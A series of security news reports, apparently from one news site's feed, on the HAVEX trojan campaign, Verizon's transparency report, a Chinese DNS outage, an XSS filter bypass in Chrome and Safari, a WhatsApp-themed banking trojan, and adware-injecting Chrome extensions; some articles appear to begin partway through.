The attackers have leveraged watering hole attacks to infect users inside the critical infrastructure organizations to spread a remote access Trojan known as HAVEX. According to Crowdstrike’s 2013 Threat Report, released this morning, the RAT drops malware on compromised machines that sends system information to a command and control server, as well as credential-harvesting tools that steal passwords from browsers, and backdoors that communicate with the hackers’ infrastructure to drop additional payloads. It also uses RSA public key cryptography to encrypt and authenticate the malware files it drops. Generally attackers use low-grade encryption algorithms, said Adam Myers, vice president of intelligence at Crowdstrike.
“It’s well built. The people who had it built had more capable programmers than we’ve typically seen with the Chinese-based adversary,” said Myers. “That was something that piqued our interest when you see a nice clean piece of code like that. The functionality is something that you would typically expect but the leveraging of the RSA encryption algorithm is a lot more complicated than most of the stuff we see. Implementing public key cryptography is fairly unique for these types of attacks.”
Another noteworthy characteristic of the attacks, Myers said, is the fact that the attackers are querying the BIOS of machines inside these organizations.
“We’re not sure if they’re exploiting BIOS, but they are taking note of what BIOS is installed,” he said. “It’s possible they have some capability.”
Myers said that it’s not out of the realm of possibility for an attacker to copy out a machine’s BIOS and replace it with a custom BIOS. Such activity allows an attacker to maintain persistent presence on a computer, even if a hard drive is replaced, for example.
“And if you wanted to brick the machine, there’s no better way than to overwrite the BIOS,” Myers said.
The attacks are not limited to the U.S., Crowdstrike said; government agencies, manufacturing firms, defense contractors, healthcare and technology companies in Europe, the Middle East and Asia have also been targeted.
Crowdstrike said its data supports nation-state sponsorship of this campaign, given the sophistication of the tools, command and control activity, and the build-times of the malware samples and backdoor communication—all of which coincide with Russian working hours, the report said.
“The level and extent to which oil and gas were targeted was another thing to us that made it seem like it was very focused,” Myers said. “When you see that kind of focus in a targeted attack in terms of victimology, that’s something that gets your attention.”
“If you look back even as far as 2006, you see targeted attackers using a lot of Microsoft Office exploits until they exhausted all the low-hanging vulnerabilities in those products and then moved into Adobe and others,” Myers said. “It was the easiest way in; they’re not spending a lot of time looking for vulnerabilities, just using low-hanging stuff like Java to get around ASLR and stringing exploits together to get in. Anything that makes it easier for attackers…that’s why we’re seeing a lot of strategic web compromises.”
After months of public calls from privacy advocates and security experts, Verizon on Wednesday released its first transparency report, revealing that it received more than 164,000 subpoenas and between 1,000 and 2,000 National Security Letters in 2013. The report, which covers Verizon’s landline, Internet and wireless services, shows that the company also received 36,000 warrants, most of which requested location or stored content data.
Large Internet companies such as Google, Twitter, Facebook and Microsoft have been publishing transparency reports for several years now, detailing the volume and types of requests for information that they get from the government and law enforcement. The reports vary from company to company but typically include data on warrants, court orders and some information on NSLs. The government only allows companies to publish the volume of NSLs they receive in ranges of 1,000.
Critics have been pushing for mobile phone providers to publish similar reports, and those calls have grown louder in the months since the Edward Snowden NSA leaks began. Verizon is the second mobile phone provider to publish such a report, after Credo Mobile published its own earlier this month.
The most interesting piece of data in the report may be the fact that Verizon received about 35,000 requests for location information from law enforcement. More than two-thirds of those requests were in the form of court order. The company said that these kinds of requests are becoming more frequent every year.
“Verizon only produces location information in response to a warrant or order; we do not produce location information in response to a subpoena. Last year, we received about 35,000 demands for location data: about 24,000 of those were through orders and about 11,000 through warrants. In addition, we received about 3,200 warrants or court orders for “cell tower dumps” last year. In such instances, the warrant or court order compelled us to identify the phone numbers of all phones that connected to a specific cell tower during a given period of time. The number of warrants and orders for location information are increasing each year,” the report says.
Although some other companies will not produce location information and other sensitive data without a warrant, Verizon says in its report that it will do so “in response to a warrant or order”. The bar for a warrant is higher than it is for a typical court order, which only requires law enforcement to go before a judge. Warrants require a showing of probable cause that the data is somehow related to a crime.
More than half of the 321,545 total requests that Verizon received in 2013 were subpoenas. Unlike some other kinds of requests, the data that companies have turn over in response to a subpoena does not include content, such as texts or call content, but rather comprises information such as the name and address associated with a number or some transactional data. The company also received a large volume of court orders, more than 70,000. About 10 percent of those orders were pen register or trap and trace orders, which give law enforcement access to call data in real time.
“A pen register order requires us to provide law enforcement with real-time access to phone numbers as they are dialed, while a trap and trace order compels us to provide law enforcement with real-time access to the phone numbers from incoming calls. We do not provide any content in response to pen register or trap and trace orders. We received about 6,300 court orders to assist with pen registers or trap and traces last year, although generally a single order is for both a pen register and trap and trace. Far less frequently, we are required to assist with wiretaps, where law enforcement accesses the content of a communication as it is taking place. We received about 1,500 wiretap orders last year,” Verizon said in its report.
The restrictions that the government places on the way companies can report the number of NSLs they receive make it difficult to compare volumes between companies. However, the range of 1,0000-1,999 that Verizon reported is on the higher end of what’s been published by the various companies in their transparency reports recently. Unlike some of the other vendors who have published reports, Verizon detailed what kind of information it provides in response to an NSL.
“The FBI may seek only limited categories of information through an NSL: name, address, length of service and toll billing records. The FBI cannot obtain other information from Verizon, such as content or location information, through an NSL,” the report says.
Much of the Internet was inaccessible to Chinese users for more than an hour yesterday after a domain name system error – believed by some to have been the result of a censorship error – led Web-surfers to a blank page hosted by an American technology company.
While users were able to access Web-addresses hosted by China’s top level, .cn domain, the South China Morning Post reports that .com, .net, and .org domains would not resolve properly. Instead, users attempting to visit sites not hosted by China’s TLD were being redirected to a site owned an operated by Dynamic Internet Technology, a U.S. company that touts itself as a developer of censorship-defeating software. The company also reportedly helps host the Epoch Times and other sites banned by the Chinese government.
The South China Morning Post spoke with Dynamic Internet Technology CEO and founder, Bill Xia. He confirmed that the redirect website did indeed belong to his company but attributed the DNS issues to an error in China’s massive Web censorship system, often referred to as the Great Firewall of China.
“We noticed a sudden increase of traffic and suspected we were under attack,” Xia told the South China Morning Post. “Our security system has activated a protection mechanism so visitors to the address are not able to see any thing.”
Xia went on to claim that the incident bore similarities to another more than ten years ago in which China’s DNS restrictions backfired and routed Internet users to the website of a spiritual group known as the Falun Gong, a group the Chinese government reportedly considers a cult. It should be noted that the Epoch Times, one of Dynamic Internet Technologies clients, is often associated with the Falun Gong.
In contrast to Xia’s assertion, numerous reports indicate that Chinese officials and other hardliners are blaming the outage on a cyberattack.
There is a bug in the anti-cross site scripting filter in Chrome and Safari that enables an attacker to bypass the filter in some cases and use an XSS flaw on a given site to compromise visitors’s machines. The vulnerability is fairly simple to exploit and a researcher has posted proof-of-concept code.
The vulnerability lies in the way that anti-XSS filters handle a specific attribute in IFRAME tags. These filters are designed to prevent attackers from being able to use XSS flaws on vulnerable Web sites in order to run malicious injected code in users’ browsers. Exploiting this flaw allows the attacker to bypass the filter and run his injected code.
Palop said he informed Google of the vulnerability in Chrome back in October and the company developed a fix a couple of days later. The patch landed in the stable Chrome channel in the recent release of version 32. He said that the vulnerability still exists in Safari on Mac and iPhone, however. Eleven Paths contacted Apple about the flaw, but the company said it is still working on the issue.
“They confirmed our email, and told us they were working on it. And seems that they still are, since the program is still vulnerable. Everytime we have tried to contact back with them again, they reply back telling there is no news, but they are working on it,” the company blog post said.
Robert Hansen, a security researcher and director of product management at WhiteHat Security, said the attack could be a problem, although it’s not the most common XSS attack scenario.
“The attack does rely on being injected into an existing iframe tag. That does happen, but it somewhat rare compared to the more common HTML or parameter injection variants and is often also coupled to a “content spoofing” exploit as well as defined by WASC. Generally speaking people who use iframes should be wary of accepting user input to dictate the location of the frame and sanitizing input is always a good idea,” Hansen said.
Image from Flickr photos of Tiger Girl.
Spam emails promoting a non-existent PC version of the popular WhatsApp messaging service could be leading unsuspecting users to a malicious banking Trojan.
The emails, written in Portuguese, trick the recipient into thinking they already have 11 pending friend invitations, according to Kaspersky Lab’s Dmitry Bestuzhev, who wrote about the malware today on Securelist.com.
If users click on the “Baixor Agora” (Download Now) link in the email, they’re redirected – through a hacked Turkish server – to a Hightail.com URL to download the Trojan. Hightail, like Dropbox or YouSendIt, is a service that allows cloud file storage and downloads. The downloader then downloads the banker via a server in Brazil. According to Bestuzhev, the file comes disguised as a relatively small 2.5 megabyte MP3 file, making it more likely users will open it.
Once it’s set up the malware gets to work, stealing data, and packing it up and shipping it off to the cybercriminal before downloading new malware files, up to 10 megabytes in size, to the system.
“The malware reports itself to the cybercriminals’ infections statistics console and when open, a local port 1157 sends stolen information in the Oracle DB format,” Bestuzhev wrote today.
It’s unclear if the malware has made it to U.S. shores yet but given the popularity of WhatsApp abroad – especially in Europe and Latin America – it appears to be contained to those areas, at least for now.
Bestuzhev even goes as far as to call it a “classic style of a Brazilian-created malware,” as it appears to be targeting users in Brazil, a country with an established WhatsApp userbase and the Trojan is downloaded from a Brazilian server.
The cross-platform messaging app has been massively popular as of late, boasting more than 430 million users, 30 million added in just the last month, and sending more than 50 billion messages a day. Rumors Google was going to acquire the service last spring for roughly $1 billion bubbled up but quickly deflated.
The company’s CEO and co-founder Jan Koum has previously said the company makes a point to know as little as possible about its users and that it doesn’t collect people’s personal information, just users’ phone numbers and a list of users they want to communicate with.
While that may be true, it was reported in October that if someone wanted to eavesdrop on users’ WhatsApp conversations, it could be done, “given enough effort.”
Dutch researcher Thijs Alkemade disclosed a vulnerability in the app’s crypto implementation, specifically the fact that it uses the same key for incoming and outgoing messages, that could leave messages exposed. The company balked at Alkemade’s research however, deeming it taking place in a scenario “more theoretical in nature.”
This isn’t the first spam email campaign centered around the app. Spammers also leveraged the service in November to push malware via email by tricking users into thinking they had a new voicemail, even though WhatsApp does not provide a calling feature, it is a text messaging service.
Two Chrome extensions went from legitimate browsing ad-ons to adware-spewing nuisances in the blink of a legitimate transaction.
Google recently took action against the Add to Feedly and Tweet this Page extensions, removing both from the Chrome Store after they were sold to adware brokers and found to be injecting ads into pages visited by users. Big picture, the risk has been mitigated, but it also exposed a weakness in Google’s auto-update mechanism, which automatically inserted changes configured by the new owners of the respective extensions without a head’s up to users.
Amit Agarwal, a popular blogger in India, sold the Add to Feedly extension after receiving a four-figure offer, he said. The deal was too good to resist, especially considering the extension took him an hour to develop. Agarwal admits he did not know the buyer, nor why they would pay good money for a Chrome extension that had been downloaded more than 30,000 times when it was sold.
Agarwal said that within a month, the new owner had built in advertising and users were seeing ads injected onto random websites they visited.
“These aren’t regular banner ads that you see on web pages, these are invisible ads that work the background and replace links on every website that you visit into affiliate links,” Agarwal wrote on his website labnol.org. “In simple English, if the extension is activated in Chrome, it will inject adware into all web pages.”
Google pulled the extensions from the Chrome store because they were in violation of the quality guidelines established by the company. Google’s policy states that extensions must have a single purpose and users should not be forced to agree to additional functionality, especially if it is unrelated to the extension.
“If two pieces of functionality are clearly separate, they should be put into two different extensions, and users should have the ability to install and uninstall them separately,” the policy states, adding that this goes for bundled toolbars as well; Google says those should be separate extensions.
The spammers’ actions are clever. Purchasing popular extensions such as Agarwal’s, which he said was developed in response to Google’s decision to shut down Google Reader, provides spammers and adware purveyors with an effective vehicle to peddle ads for profit. Couple that with the fact they can piggyback onto Google’s silent auto-update mechanism makes for an inviting vector to push not only spam but even malware.
“The extension does offer an option to opt-out of advertising (you are opted-in by default) or you can disable them on your own by blocking the superfish.com and www.superfish.com domains in your hosts file,” Agarwal said of his old extension. “But quietly sneaking ads doesn’t sound like the most ethical way to monetize a product.”